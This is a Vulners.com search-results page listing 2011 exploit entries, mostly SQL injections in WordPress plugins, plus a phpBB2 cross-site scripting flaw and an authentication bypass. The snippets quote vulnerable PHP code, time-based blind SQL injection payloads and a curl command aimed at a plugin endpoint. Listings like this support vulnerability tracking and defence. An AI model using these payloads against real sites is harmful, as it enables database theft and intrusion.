CVE Search Engine - Security Vulnerabilities and Exploits Search Tool | Vulners.com

🔥 Daily Hot!

💪🏽 CPE Enhanced Advisories

🕶 Shadow Exploits

🕵🏼 Vulners CPE

🔐 Security news

💻 Exploit updates

📑 Blogs review

🐧 Linux vulnerabilities

🤖 AI High Score

show all

1375 matches found

Packet Storm•added 2011/09/04 12:0 a.m.•22 views

WordPress Zotpress 4.4 SQL Injection

Exploit Title: WordPress Zotpress plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0%23 --------------- Vulnerable code --------------- if $mzrapiuserid == false && $mzrinclude == false && isset$GET'apiuserid' && pregmatch"/^0-9+$/", $GET'apiuserid' $mzrapiuserid = trim$GET'apiuserid';...

Exploit DB•added 2011/09/03 12:0 a.m.•24 views

WordPress Plugin Facebook Opengraph Meta 1.0 - SQL Injection

Exploit Title: WordPress Facebook Opengraph Meta Plugin plugin getvar"SELECT COUNT AS count FROM $wpdb-postmeta WHERE metakey = 'OgMeta'"; $count = $result'count'; if $count 0 $totalpages = ceil$count/$limit; else $totalpages = 0; if $page $totalpages $page=$totalpages; $start = $limit$page -...

Packet Storm•added 2011/09/02 12:0 a.m.•21 views

WordPress VideoWhisper Video Presentation 1.1 SQL Injection

Exploit Title: WordPress VideoWhisper Video Presentation plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20 e.g.: curl --data "s=-1' AND 1=IF21,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0-- " http://www.site.com/wp-content/plugins/videowhisper-video-presentation/vp/cstatus.php...

Exploit DB•added 2011/09/02 12:0 a.m.•28 views

WordPress Plugin VideoWhisper Video Presentation 1.1 - SQL Injection

Exploit Title: WordPress VideoWhisper Video Presentation plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20 e.g.: curl --data "s=-1' AND 1=IF21,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0-- " http://www.site.com/wp-content/plugins/videowhisper-video-presentation/vp/cstatus.php...

0day.today•added 2011/09/01 12:0 a.m.•18 views

WordPress SearchAutocomplete plugin <= 1.0.8 SQL Injection Vulnerability

Exploit for php platform in category web applications Exploit Title: WordPress SearchAutocomplete plugin getresults"SELECT posttitle As name, ID as postid, guid AS url, 1 cnt FROM ".$wpdb-prefix."posts t WHERE poststatus='publish' and posttype='post' OR posttype='page' and postdate NOW and...

Packet Storm•added 2011/08/31 12:0 a.m.•26 views

WordPress WP Audio Gallery Playlist 0.12 SQL Injection

Exploit Title: WordPress wp audio gallery playlist plugin prefix . "posts"; ... if isset$GET'postgallery' $query = 'SELECT FROM '.$tablename.' WHERE postparent = ''.$GET'postgallery'.'' AND postmimetype = 'audio/mpeg' ORDER BY menuorder ASC';...

Packet Storm•added 2011/08/31 12:0 a.m.•25 views

WordPress Yolink Search 1.1.4 SQL Injection

Exploit Title: WordPress yolink Search plugin getresults $wpdb-prepare "SELECT ID,GUID FROM $wpdb-posts WHERE poststatus='publish' AND posttype IN $posttypein AND ID $idfrom order by ID asc LIMIT $batchsize" ; //misusage of $wpdb-prepare :...

Exploit DB•added 2011/08/30 12:0 a.m.•40 views

vAuthenticate 3.0.1 - Authentication Bypass

----------------------------------------------------------------------- vAuthenticate 3.0.1 Auth Bypass by Cookie SQL Injection Vulnerability ----------------------------------------------------------------------- Author: bd0rk Contact: bd0rkathackermail.com Date: 2011 / 08 / 30 MEZ-Time: 01:35...

Exploit DB•added 2011/08/30 12:0 a.m.•25 views

WordPress Plugin Couponer 1.2 - SQL Injection

Exploit Title: WordPress Couponer plugin = 1.2 SQL Injection Vulnerability Date: 2011-08-31 Author: Miroslav Stampar miroslav.stamparatgmail.com @stamparm Software Link: http://downloads.wordpress.org/plugin/couponer.zip Version: 1.2 tested Note: magicquotes has to be turned off --- PoC ---...

exploitpack•added 2011/08/30 12:0 a.m.•16 views

WordPress Plugin Advertizer 1.0 - SQL Injection

WordPress Plugin Advertizer 1.0 - SQL Injection Exploit Title: WordPress Advertizer plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20 --------------- Vulnerable code --------------- $res = $wpdb-getrow"SELECT limitclicks, traceclicks FROM ".$wpdb-prefix."advvbase WHERE id =...

Exploit DB•added 2011/08/30 12:0 a.m.•22 views

WordPress Plugin Advertizer 1.0 - SQL Injection

Exploit Title: WordPress Advertizer plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20 --------------- Vulnerable code --------------- $res = $wpdb-getrow"SELECT limitclicks, traceclicks FROM ".$wpdb-prefix."advvbase WHERE id = '".$POSTid."' limit 1;";...

seebug.org•added 2011/08/29 12:0 a.m.•15 views

WordPress Evarisk plugin <= 5.1.3.6 SQL Injection Vulnerability

No description provided by source. Exploit Title: WordPress Evarisk plugin = 5.1.3.6 SQL Injection Vulnerability Date: 2011-08-28 Author: Miroslav Stampar miroslav.stamparatgmail.com @stamparm Software Link: http://downloads.wordpress.org/plugin/evarisk.5.1.3.6.zip Version: 5.1.3.6 tested Note:...

seebug.org•added 2011/08/28 12:0 a.m.•24 views

PhpBB2 Custom Mass PM 1.4.7 Cross Site Scripting

No description provided by source. ^ Exploit title: PhpBB2 Module "Custom Mass PM" Cross Site Scripting Vulnerability ^ Author : Silic0n sciencemedia017Atyahoo.com ^ MOD Title: Custom mass PM ^ MOD Description: Add mass PM functionnality to group members or all forums members for authorized users...

Packet Storm•added 2011/08/27 12:0 a.m.•24 views

PhpBB2 Custom Mass PM 1.4.7 Cross Site Scripting

------------------------------------------------------------------------------- 0 | | | | | | TM 1 | | | | | | 0 | / | ' \ / | ' \ / |/ | |/ / \ '| ' \ / \ | 1 / / | | | | / | | | | | | | alertdocument.cookie -------------------- ^ Vulnearble code -------------------- $tousernamearray = explode...

exploitpack•added 2011/08/18 12:0 a.m.•9 views

WordPress Plugin DS FAQ 1.3.2 - SQL Injection

WordPress Plugin DS FAQ 1.3.2 - SQL Injection Exploit Title: WordPress WP DS FAQ plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0 --------------- Vulnerable code --------------- switch$POST'action' ... case 'deletefaqbook': if!isset$POST'id' error; $id = $POST'id'; ... $sql = "DELETE FRO...

seebug.org•added 2011/08/18 12:0 a.m.•13 views

WordPress Easy Contact Form Lite plugin <= 1.0.7 SQL Injection Vulnerability

No description provided by source. Exploit Title: WordPress Easy Contact Form Lite plugin = 1.0.7 SQL Injection Vulnerability Date: 2011-08-17 Author: Miroslav Stampar miroslav.stamparatgmail.com @stamparm Software Link: http://downloads.wordpress.org/plugin/easy-contact-form-lite.zip Version:...

Packet Storm•added 2011/08/18 12:0 a.m.•15 views

WordPress Contus HD FLV Player 1.3 SQL Injection

Exploit Title: WordPress Contus HD FLV Player plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0&listItem=1 --------------- Vulnerable code --------------- $pid1 = $GET'playid'; foreach $GET'listItem' as $position = $item : mysqlquery"UPDATE $wpdb-prefix" . "hdflvmed2play SET sorder =...

Exploit DB•added 2011/08/18 12:0 a.m.•28 views

WordPress Plugin Ajax Gallery 3.0 - SQL Injection

Exploit Title: WordPress Ajax Gallery plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0 --------------- Vulnerable code --------------- if isset $GET 'delete' && isset $GET'gId' $wpdb-query "DELETE FROM $wpdb-options WHERE optionname='agItem' and optionid=".$GET'gId' ; echo "Galeria...

Exploit DB•added 2011/08/18 12:0 a.m.•21 views

WordPress Plugin Global Content Blocks 1.2 - SQL Injection

Exploit Title: WordPress Global Content Blocks plugin 0 // intval"1a" = 1 : $entry = $wpdb-getrow"select from ".$wpdb-prefix."gcb where id=".$id; $finaltext = base64encode$entry-name."". base64encode$entry-description."". base64encode$entry-value."". base64encode$entry-type;...

exploitpack•added 2011/08/16 12:0 a.m.•14 views

WordPress Plugin IP-Logger 3.0 - SQL Injection

WordPress Plugin IP-Logger 3.0 - SQL Injection Exploit Title: WordPress IP-Logger plugin = 3.0 SQL Injection Vulnerability Date: 2011-08-16 Author: Miroslav Stampar miroslav.stamparatgmail.com @stamparm Software Link: http://downloads.wordpress.org/plugin/ip-logger.3.0.zip Version: 3.0 tested ---...

Rows per page

Query Builder

Family

Bulletin Type

Min CVSS Score

Date

Order by